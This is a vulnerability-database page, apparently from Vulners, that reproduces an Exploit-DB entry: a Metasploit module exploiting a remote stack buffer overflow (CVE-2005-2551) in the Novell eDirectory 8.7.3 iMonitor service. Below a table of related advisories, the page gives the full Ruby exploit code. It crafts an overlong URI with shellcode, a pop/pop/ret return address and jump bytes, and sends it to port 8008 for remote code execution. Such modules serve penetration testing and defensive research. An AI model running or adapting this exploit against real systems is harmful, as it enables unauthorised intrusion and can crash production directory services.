Lucene search
K

eDirectory 8.7.3 - iMonitor Remote Stack Buffer Overflow (Metasploit)

🗓️ 13 Jul 2010 00:00:00Reported by MetasploitType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 46 Views

eDirectory 8.7.3 iMonitor Remote Buffer Overflo

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2005-2551
13 Jul 201000:00
circl
Check Point Advisories
Novell eDirectory iMonitor NDS Server Buffer Overflow (CVE-2005-2551; CVE-2006-2496)
10 Jun 201000:00
checkpoint_advisories
CVE
CVE-2005-2551
12 Aug 200504:00
cve
Cvelist
CVE-2005-2551
12 Aug 200504:00
cvelist
Tenable Nessus
Novell eDirectory Server iMonitor Multiple Remote Overflows
12 Aug 200500:00
nessus
Metasploit
eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow
26 Dec 200514:34
metasploit
NVD
CVE-2005-2551
12 Aug 200504:00
nvd
Packet Storm
eDirectory 8.7.3 iMonitor Remote Stack Overflow
26 Nov 200900:00
packetstorm
Saint
Novell eDirectory iMonitor buffer overflow
29 Nov 200500:00
saint
Saint
Novell eDirectory iMonitor buffer overflow
29 Nov 200500:00
saint
Rows per page
##
# $Id: edirectory_imonitor.rb 9812 2010-07-13 22:11:40Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :pattern => [ /DHost\//, /HttpStk\// ] } # custom port

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'eDirectory 8.7.3 iMonitor Remote Stack Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in eDirectory 8.7.3
				iMonitor service. This vulnerability was discovered by Peter
				Winter-Smith of NGSSoftware.

				NOTE: repeated exploitation attempts may cause eDirectory to crash. It does
				not restart automatically in a default installation.
			},
			'Author'         => [ 'anonymous', 'Matt Olney <[email protected]>' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision: 9812 $',
			'References'     =>
				[
					[ 'CVE', '2005-2551'],
					[ 'OSVDB', '18703'],
					[ 'BID', '14548'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 4150,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x26\x3d\x2b\x3f\x3a\x3b\x2d\x2c\x2f\x23\x2e\x5c\x30",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows (ALL) - eDirectory 8.7.3 iMonitor', { 'Ret' => 0x63501f15 } ], # pop/pop/ret
				],
			'DisclosureDate' => 'Aug 11 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(8008)
			], self.class)
	end

	def exploit
		c = connect

		# pop/pop/ret in ndsimon.dlm on our jump to our shellcode
		uri = '/nds/' + payload.encoded + make_nops(2) + "\xeb\x04" + [target.ret].pack('V')
		uri << "\xe9\xbd\xef\xff\xff"
		uri << "B" * 0xD0

		res = c.send_request(c.request_raw({ 'uri' => uri }))
		select(nil,nil,nil,4)

		handler
		disconnect
	end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jul 2010 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.71755
46